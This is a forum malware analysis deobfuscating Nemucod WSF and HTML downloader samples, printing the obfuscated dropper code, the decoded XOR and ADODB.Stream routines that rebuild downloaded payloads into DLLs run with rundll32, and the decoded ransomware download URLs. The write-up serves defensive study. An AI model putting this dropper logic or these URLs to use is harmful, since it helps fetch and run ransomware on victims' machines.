Malware Analysis Deobfuscation of wsf samples 3 & 4 (Malware Vault) : wsf-dropper-js_nemucod

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
3 files From : https://malwaretips.com/threads/31-8-16-6.62930/
Thanks to @Solarquest)

Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html


5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal

=>Similar obfuscation Methods used in a previous sample I analyzed :

https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/

Some changes but urls used are easily retrieved, by same method I used before

1) sample 3 & 4 : same URLS & Payload name(s) :

Looking at the end of the script

var mahorkavodkatvarMASHEVHORDA17 = "sYCfiSIE;
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");

var mahorkavodkatvarMASHEV_a5 =
[

"d3POUNId3LnlhY2h0LW1hcmtldC5lPOUNIdS9qaEJIVFls",
"
dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
"
d3POUNId3LmVxdWlwZTQuPOUNIbmV0L2poQkhUWWw="
];
var mahorkavodkatvarMASHEVHORDAI = 0;
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){

mahorkavodkatvarMASHEVHORDAI++;
try{

var mahorkavodkatvarMASHEVHORDA6 = "http://"+mahorkavodkatvarMASHEV_a5[mahorkavodkatvarMASHEVHORDA5].mahorkavodkatvarDREAMTEAM() + "?mssGTlVi=KiqvaljO";

mahorkavodkatvarMASHEV_a2(mahorkavodkatvarMASHEVHORDA6,mahorkavodkatvarMASHEVHORDA17+mahorkavodkatvarMASHEVHORDAI);
}catch(mahorkavodkatvarMASHEVCEESZZAAA){}
}

Explanations :


Names for the files downloaded :

"sYCfiSIE" + index

=> sYCfiSIE1,
=> sYCfiSIE2
=> sYCfiSIE3

URLs :

A tab is easy to be found with these values :

"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

This is Base64 codes but with a part to obfuscate them a bit more.

Looking at their function which do the coding part:

.mahorkavodkatvarDREAMTEAM()
String.prototype.mahorkavodkatvarDREAMTEAM = function() {

mahorkavodkatvarMASHEVXCOP = 0;
var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;

var mahorkavodkatvarMASHEVout = "";

var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);

...
... (Base64 decode stuff)
...
}

this["replace"](/POUNI/g, ''); => All POUNI has to be removed from text passed in parameter, to become Base64 real codes

"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"
aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"
POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

=>
Base64 real codes :
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=="
"aWZ0aWtoYXJjaGF1ZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

With a Base64 decode tool :​


=> URLs :

"http://" + "lanjaron.es.mialias.net/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=" + "?UXRxPvxm=QKvTymv"

Payload : (3 names but exactly the same ransomware ) :

"http://" + "lanjaron.es.mialias.net/jhBHTYl?UXRxPvxm=QKvTymv"

=> sYCfiSIE1 => sYCfiSIE1.dll
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl?UXRxPvxm=QKvTymv"

=> sYCfiSIE2 => sYCfiSIE2.dll
"http://" + "mojejeze.republika.pl/jhBHTYl?UXRxPvxm=QKvTymv"

=> sYCfiSIE3 => sYCfiSIE3.dll

.dll extensions are added when the deobfuscation of real files is a success

2 ) NEMUCOD part :

with some function that will be used to deobfuscate the
downloaded file and make it a real .dll :

var mahorkavodkatvarMASHEVLUCIODOR = "CWZ1bmN0aW9uIG1haG9ya2F2b2RrYXR2YXJNQVNIRVZydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2YXIgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrc1s ..........................................

All usual, these functions are hidden in a var in a Base64 encoded string.
Result on spoiler part
function mahorkavodkatvarMASHEVrtfta(filePath)
{

var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["LoadFromFile"](filePath);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
mahorkavodkatvarISHEVrosteks["close"]();
return mahorkavodkatvarMASHEVfsta(fileString);
};
function mahorkavodkatvarMASHEVfats(codeArray)
{

var t2=new Array();
var t2=new Array();

t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;


var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)

{
HIi3=codeArray[Tj];
if (HIi3 < 128){
OVc9=HIi3;
}
else
{

OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["join"]("");

return resultString;
};

function mahorkavodkatvarMASHEVsatt(filePath, codeArray)

{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["writeText"](mahorkavodkatvarMASHEVfats(codeArray));
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["close"]();
};


function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)

{
for (var Tj=0; Tj < mahorkavodkatvarMASHEVcca["length"]; Tj++)
{


mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];

}
return mahorkavodkatvarMASHEVcca;

};
The ciphered key used do do the XOR part, in red :

var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");

It returns the real string where each chars will be used for the famous XOR part : ^=
(once each of this string chars has been used => it jumps to the first char and continues)

function xdac(content_file)
{

for (var index =0; i < content_file.length; index++)
{

content_file[index] ^= xKey[Math.floor(index % xKey.length)];

}
return content_file;

};


See previous analysis :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/

3) run :


rundll32 is used, with the path file, and parameter for the dll : qwerty

4) Difference with other Nemucod samples :

To deobfuscate the payload, some functions we saw from last nemucod version (from other donwloader scripts) are not present (like in the same analysis of similar wsf droppers)


=> this is only for the XOR part, so easier in these scripts​

On latest version I have seen from other scripted downloader, the XOR part use :

uheprng(){
...
...
}

var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}

function rawprng(){

...
...
}

etc,...​

5) For sample 1 similar : qXKlF.html

The only difference :

this.replace(/LUABUA/g, '');
eval(alkotesterzercerLOBIKLUCIODOR);
=> eval hidden part

var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file when obfuscated

var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("
OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");

Result : aKey deciphered used forXOR part

var alkotesterzercerLOBIK_a5 =
[
"d3d3Lml0b2dhemFpZLUABUAGFuLmpwL0hKZ2hqdDg3Mg==",
"Y29udmVuaWxpZ
LUABUAmVjYW5iZS53ZWIuZmMyLmNvbS9ISmdoanQ4NzI=",
"ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy"
];

Base64 decode :
URLS :

"http://" + "www .itogazaidan.jp/HJghjt872" + "?'MnKqQCLOB=aTDtnTWp"
"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "reeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"

PAYLOAD :

EhFjFSNri1 => EhFjFSNri1.dll
EhFjFSNri3 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll

 
Last edited:

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
I like this format more, easier for a beginner like me to understand, showing the conclusion first then breaking it down. Thanks for making such a detail guide for non techies understand. Was able to properly guess the pattern, follow along to decoding the URL and Payload.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I like this format more, easier for a beginner like me to understand, showing the conclusion first then breaking it down. Thanks for making such a detail guide for non techies understand. Was able to properly guess the pattern, follow along to decoding the URL and Payload.
Thanks :)
The nemucod part, at the end, is the part of a string hidden somewhere in the script, for this familly. This encoded string hide the functions that make the deobfuscation of the payload, downloaded by the other parts of the script, shown on part 1.
Then, I don't realy show the conclusion first, only the "normal" obfuscated part that download the payload, and in the part 2 : the content of the encoded string : the nemucod functions
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top